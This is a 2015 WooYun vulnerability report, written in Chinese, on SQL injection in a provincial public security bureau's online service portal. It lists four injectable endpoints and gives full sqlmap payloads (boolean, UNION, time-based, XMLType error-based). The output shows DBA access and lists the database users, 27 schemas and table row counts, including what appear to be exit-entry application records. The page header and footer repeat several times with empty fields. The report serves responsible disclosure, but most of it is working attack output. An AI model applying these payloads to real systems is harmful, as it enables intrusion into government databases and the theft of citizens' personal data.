某敏感部门网上办事大厅另一端口多个参数存在SQL注入（DBA权限+涉及27个数据库+大量数据可泄露）之二

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145686

漏洞标题：某敏感部门网上办事大厅另一端口多个参数存在SQL注入（DBA权限+涉及27个数据库+大量数据可泄露）之二

漏洞作者：路人甲

提交时间：2015-10-10 10:12

修复时间：2015-11-24 11:10

公开时间：2015-11-24 11:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-10：细节已通知厂商并且等待厂商处理中
2015-10-10：厂商已经确认，细节仅向厂商公开
2015-10-20：细节向核心白帽子及相关领域专家公开
2015-10-30：细节向普通白帽子公开
2015-11-09：细节向实习白帽子公开
2015-11-24：细节向公众公开

简要描述：

另外一端口，多个多处存在SQL注入，DBA权限，27个数据库。IP地址请帮忙打码，另外如有敏感信息，也请管理员帮忙打码！

详细说明：

终于可以访问了，前几天端口被测试出现问题了？一直访问不了，这次测试就降低线程，降低等级测试吧！~~~
吉林省公安机关网上公安局

**.**.**.**:8000/

进入网上服务平台，然后进入业务办理，业务分类处，随便选择一个，然后打开一项开始抓包，购买许可证后停止，对抓包的进行测试
注入一：

**.**.**.**:8000/firstList.jsp?sid=4028811932a87caf0132a89ac07f0010

sid存在注入，DBA权限
类似如下的地方都是存在sid注入的，一个参数来着。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 7008=7008 AND 'sZux'='sZu
x
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: sid=4028811932a87caf0132a89ac07f0010' UNION ALL SELECT CHR(113)||CH
R(98)||CHR(102)||CHR(116)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(75)||CHR(1
09)||CHR(90)||CHR(86)||CHR(83)||CHR(107)||CHR(117)||CHR(113)||CHR(97)||CHR(106)|
|CHR(106)||CHR(113),NULL FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 4368=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(100)||CHR(74)||CHR(70)||CHR(65),5) AND 'NZDu'='NZDu
---
[01:05:33] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:05:33] [INFO] fetching current user
current user:    'NOTA'
[01:05:34] [INFO] fetching current database
[01:05:34] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:05:34] [INFO] testing if current user is DBA
current user is DBA:    True

[01:10:40] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:10:40] [INFO] fetching database users
database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

[01:11:19] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:11:19] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[01:11:19] [INFO] fetching database (schema) names
available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

Database: HR
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| EMPLOYEES   | 107     |
| DEPARTMENTS | 27      |
| COUNTRIES   | 25      |
| LOCATIONS   | 23      |
| JOBS        | 19      |
| JOB_HISTORY | 10      |
| REGIONS     | 4       |
+-------------+---------+

Database: NOTA
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE         | 14284896 |
| TRIGGER_MESSAGE         | 1378479 |
| CRJ_YW_BZJDJGB          | 978587  |
| PROJECTSMS              | 142078  |
| CRJ_YW_WSSQ_HGTSQXXB    | 57847   |
| CRJ_YW_WSSQ_TWZJBLB     | 57677   |
| CRJ_YW_WSSQ_GXRB        | 34602   |
| CRJ_YW_WSSQ_JTCYB       | 33178   |
| CRJ_YW_WSSQ_QZBLB       | 29193   |
| APPLY_DOC               | 21602   |
| JITTASK                 | 18699   |
| CRJ_YW_WSSQ_YYXXB       | 17721   |
| JITTASKINSTANCE         | 15166   |
| JITTRANSITION           | 14922   |
| FLOWSARCHIVE            | 14137   |
| "CONDITION"             | 14129   |
| WEBFUJIAN               | 13130   |
| JITFUJIAN               | 11713   |
| APPLY_LAWS              | 8117    |
| WEBPROCESSINSTANCE      | 4486    |
| JITPROCESSDATA          | 4251    |
| JITPROCESSDEFINITION    | 4238    |
| PROTYPE_RELATION        | 3915    |
| SHOULI                  | 3813    |
| WORKDATE                | 3652    |
| JITPROCESSINSTANCE      | 3411    |
| PROJECTINFO             | 3271    |
| PROJECTARCHIVES         | 3238    |
| QUJIANTAB               | 3217    |
| DOCUMENTS               | 3104    |
| CRJ_YW_SWDWB            | 2911    |
| CRJ_YW_WSSQ_YQRB        | 1614    |
| LAWS                    | 1210    |
| PROJECTSORT             | 1060    |
| PROJECTANNEX            | 826     |
| CRJ_YW_WSSQ_CXSQXXB     | 590     |
| CRJ_YW_WSSQ_BGJZB       | 332     |
| CRJ_YW_BZJDCXB          | 276     |
| PROJECTINFOMB           | 182     |
| DICTIONARY              | 165     |
| JITVARIABLEDEFINITION   | 108     |
| ADDRESSZD               | 92      |
| CRJ_YW_WSSQ_CXSQJGB     | 84      |
| HANDUPINFO              | 74      |
| PROJECTTBL              | 57      |
| PLAN_TABLE              | 56      |
| CRJ_YW_WSSQ_WGR_ZJSQB   | 53      |
| CRJ_YW_WSSQ_WGR_QZBL_GR | 33      |
| JITFUJIAN2              | 26      |
| CRJ_YW_WSSQ_WGR_XXRB    | 13      |
| JITFORMINFO             | 12      |
| QJTYPE                  | 11      |
| DEALWRONG               | 10      |
| PROJECTSMSDEFINITION    | 7       |
| SCORETYPE               | 5       |
| WEBFORM                 | 4       |
| CHANNEL                 | 3       |
| DUBANPRO                | 3       |
| QJCLASS                 | 3       |
| TOUSUTYPE               | 2       |
| WEBARCHIVES             | 2       |
| WORKTIME_STANDARD       | 1       |
+-------------------------+---------+

+------------+---------+
| Table      | Entries |
+------------+---------+
| LOG        | 32673   |
| SYSOP_LOG  | 4165    |
| STRUCTURE  | 2847    |
| STAFF      | 1497    |
| DEPARTMENT | 1232    |
| ROLERELATE | 252     |
| FLOOR_REL  | 28      |
| SYSTEMINFO | 3       |
| MANAGER    | 1       |
+------------+---------+

数据信息量很大，就不继续了！
注入点二：

**.**.**.**:8000/getdata.jsp (POST)
id=2c9086e432753cd1013275513a6a0003&dictid=null

dictid参数存在延时注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: dictid
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=2c9086e432753cd1013275513a6a0003&dictid=null' AND 2862=DBMS_PIPE
.RECEIVE_MESSAGE(CHR(67)||CHR(119)||CHR(87)||CHR(84),5) AND 'cMIy'='cMIy
---
[01:26:48] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:26:48] [INFO] fetching current user
[01:26:48] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[01:26:48] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[01:27:03] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[01:27:13] [INFO] adjusting time delay to 1 second due to good response times
NOTA
current user:    'NOTA'
[01:27:27] [INFO] fetching current database
[01:27:27] [INFO] resumed: NOTA
[01:27:27] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:27:27] [INFO] testing if current user is DBA
current user is DBA:    True

注入点三：
进入网上服务平台，结果查询

**.**.**.**:8000/self/showWssb100.jsp?
searchNum=6406&piid=11111111111111111111&col3=222222&hiddenFlag=1

piid存在注入

sqlmap identified the following injection points with a total of 374 HTTP(s) req
uests:
---
Place: GET
Parameter: piid
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: searchNum=6406&piid=11111111111111111111' AND 3868=DBMS_PIPE.RECEIV
E_MESSAGE(CHR(65)||CHR(103)||CHR(84)||CHR(97),5) AND 'GTjm'='GTjm&col3=222222&hi
ddenFlag=1
---
[02:18:20] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:18:20] [INFO] fetching current user
[02:18:20] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[02:18:20] [INFO] retrieved:
[02:18:20] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[02:18:44] [INFO] adjusting time delay to 1 second due to good response times
NOTA
current user:    'NOTA'
[02:19:04] [INFO] fetching current database
[02:19:04] [INFO] resumed: NOTA
[02:19:04] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[02:19:04] [INFO] testing if current user is DBA
current user is DBA:    True

注入点四：
进入网上服务平台，结果查询，下面的那个

**.**.**.**:8000/self/showWssbList100.jsp (POST)
col5=13888888888&col6=11111111111&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5

col5、col6、col3这三个参数都存在注入

sqlmap identified the following injection points with a total of 559 HTTP(s) req
uests:
---
Place: POST
Parameter: col3
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: col5=13888888888&col6=11111111111&col3=22222222' AND 7676=(SELECT U
PPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)|
|(SELECT (CASE WHEN (7676=7676) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112
)||CHR(101)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND 'GazS'='GazS&searchNum=
6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col5=13888888888&col6=11111111111&col3=22222222' AND 4780=DBMS_PIPE
.RECEIVE_MESSAGE(CHR(89)||CHR(77)||CHR(83)||CHR(73),5) AND 'sJRg'='sJRg&searchNu
m=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Place: POST
Parameter: col5
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: col5=13888888888') AND 4947=(SELECT UPPER(XMLType(CHR(60)||CHR(58)|
|CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CASE WHEN (4947=4947
) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||CHR(99)||CHR(113)
||CHR(62))) FROM DUAL) AND ('YrhE'='YrhE&col6=11111111111&col3=22222222&searchNu
m=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col5=13888888888') AND 9355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(
70)||CHR(118)||CHR(115),5) AND ('ATnp'='ATnp&col6=11111111111&col3=22222222&sear
chNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Place: POST
Parameter: col6
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: col5=13888888888&col6=11111111111') AND 3930=(SELECT UPPER(XMLType(
CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CAS
E WHEN (3930=3930) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||
CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND ('YJCa'='YJCa&col3=22222222&searchNu
m=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col5=13888888888&col6=11111111111') AND 9312=DBMS_PIPE.RECEIVE_MESS
AGE(CHR(71)||CHR(106)||CHR(90)||CHR(82),5) AND ('KsUP'='KsUP&col3=22222222&searc
hNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: col5, type: Single quoted string (default)
[1] place: POST, parameter: col6, type: Single quoted string
[2] place: POST, parameter: col3, type: Single quoted string
[q] Quit
> 0
[02:29:09] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:29:09] [INFO] fetching current user
[02:29:10] [INFO] retrieved: NOTA
current user:    'NOTA'
[02:29:10] [INFO] fetching current database
[02:29:10] [INFO] resumed: NOTA
[02:29:10] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[02:29:10] [INFO] testing if current user is DBA
current user is DBA:    True

下次再测试其他地方的参数吧！~~~应该还有地方的参数存在注入的。

漏洞证明：

修复方案：

过滤
权限限制

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-10-10 11:08

厂商回复：

感谢提交！！
验证确认所描述的问题，已通知其修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145686

漏洞标题：某敏感部门网上办事大厅另一端口多个参数存在SQL注入（DBA权限+涉及27个数据库+大量数据可泄露）之二

相关厂商：公安部一所

漏洞作者：路人甲

提交时间：2015-10-10 10:12

修复时间：2015-11-24 11:10

公开时间：2015-11-24 11:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145686

漏洞标题：某敏感部门网上办事大厅另一端口多个参数存在SQL注入（DBA权限+涉及27个数据库+大量数据可泄露）之二

相关厂商：公安部一所

漏洞作者： 路人甲

提交时间：2015-10-10 10:12

修复时间：2015-11-24 11:10

公开时间：2015-11-24 11:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0145686"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云